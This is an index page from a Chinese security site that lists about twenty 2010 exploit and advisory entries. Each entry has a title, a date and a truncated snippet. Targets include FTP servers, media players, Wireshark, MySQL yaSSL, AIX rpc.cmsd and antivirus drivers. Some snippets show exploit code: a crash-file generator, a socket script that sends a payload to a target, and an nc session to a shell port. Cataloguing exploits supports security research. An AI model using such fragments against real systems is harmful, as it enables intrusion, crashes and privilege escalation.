首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Remote command execution exploit for the AMS2 (Alert Management Systems 2) compo
  日期:2010-02-05 10:08:39 点击:97 评论:0
#The AMS2 (Alert Management Systems 2) component of multiple Symantec products is prone to a remote #command-execution vulnerability because the software fails to adequately sanitize user-supplied #input. #Successfully exploiting this issue will all
OpenCart suffers from a cross site request forgery vulnerability
  日期:2010-02-04 09:26:04 点击:81 评论:0
Advisory Information:Title: OpenCart CSRF VulnerabilityAdvisory URL:http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/Date published: 2010-01-28Vendors contacted: OpenCartSecurity Risk: HighVulnerability Description:OpenCart is vul
RPC.cmsd remote PoC for AIX 6.1 and lower
  日期:2010-02-03 10:34:16 点击:110 评论:0
/* * Rodrigo Rubira Branco (BSDaemon) - rodrigo *noSPAM* risesecurity . org * http://www.kernelhacking.com/rodrigo * http://www.risesecurity.org*/#include stdlib.h#include stdio.h#include string.h#include unistd.h#include rpc/rpc.h#define CMSD_PROG
Digital Amp MP3 3.1 (.Mp3) Local Crash Poc
  日期:2010-02-03 10:33:30 点击:33 评论:0
#!/usr/bin/perl # H0m3 : S3curity-art.com # M4!l: Wizard-skh@hotmail.com # T3st3d on: Windows XP SP3 print Tic-Tac; my $boom=x41 x 1500; my $filename = B000M.mp3; open (FILE,$filename); print FILE $boom; print nFile successfully created!n;
Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit (Universal)
  日期:2010-02-03 10:32:45 点击:55 评论:0
/* Deepburner pro 1.9.0.228 dbr file buffer overflow exploit(universal) [~]This is buffer: {[header] 253 bytes + (junk+ next seh + seh addr) + [tail] 957 bytes} dbr/dbi file [~]Date: 29.01.2010 [~]Dicovery Credits: fl0 fl0w [~]Exploit Credits : fl0
Qihoo 360 Security Guard breg device drivers Privilege Escalation Vulnerability
  日期:2010-02-03 10:31:11 点击:132 评论:0
/*Vendor : Qihoo 360Affected Software : 360 Security Guard 6.1.5.1009Description:Qihoo 360 Security Guard is very famous in China.Some vulnerabilities have been reported in Qihoo 360 Security Guard, which can be exploited by malicious, local users t
CoreFTP v2.1 b1637 (password field) Universal BOF Exploit
  日期:2010-02-03 10:28:32 点击:127 评论:0
#!/usr/bin/python## Vulnerability : CoreFTP v2.1 b1637 (password field) Universal BOF exploit# Found by: mr_me (seeleymagic [at] hotmail [dot] com)# Coded by: mr_me corelanc0d3r# Download from : http://www.coreftp.com/download.html# Tested on : XP S
Vermillion FTP Deamon v1.31 Remote BOF Exploit
  日期:2010-02-01 10:28:54 点击:42 评论:0
# Exploit Title: Vermillion FTP Deamon Remote BOF Exploit # Date: 29/01/2010 # Author: Dz_attacker # Software Link: http://www.softsea.com/download/Vermillion-FTP-Daemon.html # Version: 1.31 # Tested on: Windows xp sp3 # Code : #!/usr/bin/python #[+
Xerox Workcenter 4150 Remote Buffer Overflow
  日期:2010-02-01 10:28:21 点击:43 评论:0
##################################################################################### Application: Xerox Workcenter 4150 Remote Buffer Overflow Platforms: Xerox Workcenter 4150 Discover Date: 2009-12-21 Author: Francis Provencher (Protek Research La
Wireshark 1.2.5 LWRES getaddrbyname stack BOF
  日期:2010-02-01 10:27:53 点击:60 评论:0
#!/usr/bin/env python # Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow PoC # with control over EIP on Debian 5.0.3 # by babi bbbbaaaabbbbiiii@operamail.com on 29 Jan 2010 # get it at http://www.wireshark.org/download/src/all-version
Lalim Compact Player (.mp3) Local Denial of Service
  日期:2010-02-01 10:26:56 点击:37 评论:0
===================================================Lalim Compact Player (.mp3) Local Denial of Service===================================================# Exploit Title: Lalim Compact Player (.mp3) Local Denial of Service (DoS)# Download : http://do
Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit
  日期:2010-01-29 09:34:28 点击:75 评论:0
//by Dlrow dlrow1991@ymail.commailto:dlrow1991@ymail.com //restore all ssdt hooks // Rising0day.cpp : Defines the entry point for the console application. // #include stdafx.h #include windows.h enum { SystemModuleInformation = 11 }; typedef struct
MySQL yassl cert parsing stack overflow (0day)
  日期:2010-01-28 10:56:24 点击:106 评论:0
#!/usr/bin/env python # # Use this code at your own risk. Never run it against a production system. # # THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCH
Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS Exploit
  日期:2010-01-28 10:54:53 点击:49 评论:0
#!/usr/bin/python # # Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit # Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com # Homepage: http://serversman.com/index_en.jsp # Download: From the app store (Free - use your It
CamShot v1.2 SEH Overwrite Exploit
  日期:2010-01-28 10:53:47 点击:76 评论:0
# CamShot SEH overwrite by tecnik import socket, sys if len(sys.argv)!=2: print Usage: camshot.py target exit() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],80)) print Sending Exploit to: + sys.argv[1] # GET request +
MySQL yaSSL SSL Hello Message Buffer Overflow (meta)
  日期:2010-01-28 10:52:51 点击:130 评论:0
### $Id: mysql_yassl_hello.rb 8242 2010-01-26 20:12:13Z jduck $##### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information
Mod_proxy from apache 1.3 - Integer overflow
  日期:2010-01-28 10:51:28 点击:79 评论:0
Name: Mod_proxy from apache 1.3 - Integer overflowwhich causes heap overflow.Author: Adam Zabrocki (pi3@itsec.pl or zabrocki@cern.ch)Date: Jan 27, 2010 Issue:Mod_proxy from apache 1.3.xx (tested on latest version - 1.3.41) allows local and remote at
Internet Explorer 6/7 - Local crash
  日期:2010-01-27 11:08:55 点击:41 评论:0
################################################################# # Securitylab.ir ################################################################# # Application Info: # Name: Microsoft IE # Version: 6 7 # Tested on : XP(SP1/SP2/SP3) ##############
Winamp 5.572 Exploit - SEH
  日期:2010-01-27 11:05:21 点击:88 评论:0
#!/usr/bin/python # ################################################################ # # Exploit Title: Winamp # ################################################################ # # tecr0c@backtrack:~/exploits/winamp$ nc -v 192.168.2.24 4444 # 192.1
KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC
  日期:2010-01-27 11:04:39 点击:43 评论:0
#!/usr/bin/perl ######################################################### ## Usage--file created--load file--b00m.wav BOOM ######################################################### print #####################################################n; print
共637页/12733条记录 首页 上一页 [394] [395] [396] 397 [398] [399] [400] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved